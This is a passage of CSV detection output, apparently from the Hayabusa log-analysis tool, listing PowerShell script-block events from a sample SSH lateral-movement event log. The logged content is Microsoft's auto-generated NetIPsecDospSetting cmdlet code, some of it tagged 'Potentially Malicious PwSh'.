= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; 
ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterEx",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"emptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) 
{ [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 
'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [Cmdlet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"emptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
$false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} 
} else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; 
Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { 
[object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [Cmdlet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 
+2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Binding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # 
.EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Binding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, 